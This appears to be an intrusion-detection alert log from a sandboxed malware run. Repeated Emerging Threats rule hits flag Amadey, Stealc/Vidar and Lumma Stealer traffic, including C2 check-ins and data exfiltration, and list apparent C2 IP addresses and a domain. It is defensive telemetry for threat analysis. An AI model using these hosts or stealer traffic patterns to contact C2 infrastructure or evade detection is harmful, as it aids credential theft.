                                                                                                                                                                                                                                                                                        2024-12-12T16:49:25.845097+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050060185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:25.845097+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050060185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:27.692012+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050061185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:27.692012+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050061185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:27.692012+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050061185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:29.345278+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1050063185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:29.585615+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050064185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:29.585615+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050064185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:29.585615+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050064185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:30.848414+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.105006531.41.244.1180TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.035333+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050067185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.035333+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050067185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.035333+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050067185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.277224+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050068185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.277224+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050068185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.277224+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050068185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.570048+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050070185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.570048+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050070185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:32.570048+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050070185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:34.388673+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050071185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:34.388673+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050071185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:34.388673+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050071185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.018645+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050072185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.018645+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050072185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.018645+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050072185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.259903+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050075185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.259903+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050075185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.259903+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050075185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.271923+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050076185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.271923+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050076185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:36.271923+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050076185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:38.318334+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050080185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:38.318334+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050080185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:38.318334+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050080185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:39.185191+01002044696ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M21192.168.2.1050078185.215.113.4380TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:40.059485+01002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.1050079116.203.10.31443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:40.059724+01002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config1116.203.10.31443192.168.2.1050079TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:40.224291+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050085185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:40.224291+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050085185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:40.224291+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050085185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:42.123906+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050091185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:42.123906+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050091185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:42.123906+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050091185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:42.846309+01002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M11116.203.10.31443192.168.2.1050088TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:43.896529+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050104185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:43.896529+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050104185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:43.896529+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050104185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:44.305053+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:45.761525+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050120185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:45.761525+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050120185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:45.761525+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050120185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:46.315458+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:47.592431+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050124185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:47.592431+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050124185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:47.592431+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050124185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:48.646766+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:49.279394+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050127185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:49.279394+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050127185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:49.279394+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050127185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:50.303983+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:51.229821+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050128185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:51.229821+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050128185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:51.229821+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050128185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:53.073352+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050131185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:53.073352+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050131185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:53.073352+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050131185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:55.009969+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050134185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:55.009969+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050134185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:55.009969+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050134185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:55.712604+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:56.698622+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050136185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:56.698622+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050136185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:56.698622+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050136185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:56.940429+01002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.1050084185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:58.579931+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050139185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:58.579931+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050139185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:49:58.579931+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050139185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:00.279337+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050141185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:00.279337+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050141185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:00.279337+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050141185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:02.307286+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050146185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:02.307286+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050146185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:02.307286+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050146185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.012827+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050148185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.012827+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050148185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.012827+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050148185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.214882+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050147185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.214882+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050147185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.214882+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050147185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.464069+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050150185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.464069+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050150185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:04.464069+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050150185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:06.015974+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050156185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:06.015974+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050156185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:06.015974+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050156185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.068063+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050165185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.068063+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050165185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.068063+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050165185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.956599+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050164185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.956599+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050164185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:08.956599+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050164185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.269536+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050174185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.269536+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050174185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.269536+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050174185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.904036+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050176185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.904036+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050176185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:09.904036+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050176185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:11.742161+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050182185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:11.742161+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050182185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:11.742161+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050182185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:13.465562+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050184185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:13.465562+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050184185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:13.465562+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050184185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:15.152143+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050192185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:15.152143+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050192185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:15.152143+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050192185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:17.071221+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050195185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:17.071221+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050195185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:17.071221+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050195185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:19.044987+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050196185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:19.044987+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050196185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:19.044987+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050196185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:20.988187+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050202185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:20.988187+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050202185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:20.988187+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050202185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:22.890926+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050207185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:22.890926+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050207185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:22.890926+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050207185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:24.214168+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.1050205185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:24.882642+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050221185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:24.882642+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050221185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:24.882642+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050221185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:26.627266+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050233185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:26.627266+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050233185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:26.627266+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050233185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:26.874704+01002058159ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)1192.168.2.10597211.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:27.130932+01002058159ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fightlsoser .click)1192.168.2.10597211.1.1.153UDP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:28.320557+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050243185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:28.320557+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050243185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:28.320557+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050243185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:28.617180+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050238172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:28.617180+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050238172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:29.760539+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1050238172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:29.760539+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1050238172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:30.297076+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050254185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:30.297076+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050254185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:30.297076+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050254185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:32.183845+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050258185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:32.183845+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050258185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:32.183845+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050258185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:32.280880+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.1050255185.215.113.20680TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:33.485834+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050259172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:33.485834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050259172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:34.064096+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050261185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:34.064096+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050261185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:34.064096+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050261185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:34.198263+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1050259172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:34.198263+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1050259172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:35.808854+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050263172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:35.808854+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050263172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:35.876600+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050265185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:35.876600+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050265185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:35.876600+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050265185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:37.750819+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050268185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:37.750819+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050268185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:37.750819+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050268185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:37.870851+01002058160ET MALWARE Observed Win32/Lumma Stealer Related Domain (fightlsoser .click in TLS SNI)1192.168.2.1050267172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:37.870851+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1050267172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:39.014059+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1050267172.67.213.48443TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:39.704101+01002017930ET MALWARE Trojan Generic - POST To gate.php with no referer1192.168.2.1050272185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:39.704101+01002022985ET MALWARE Trojan Generic - POST To gate.php with no accept headers1192.168.2.1050272185.81.68.14780TCP
                                                                                                                                                                                                                                                                                        2024-12-12T16:50:39.704101+01002022986ET MALWARE Generic Request to gate.php Dotted-Quad1192.168.2.1050272185.81.68.14780TCP
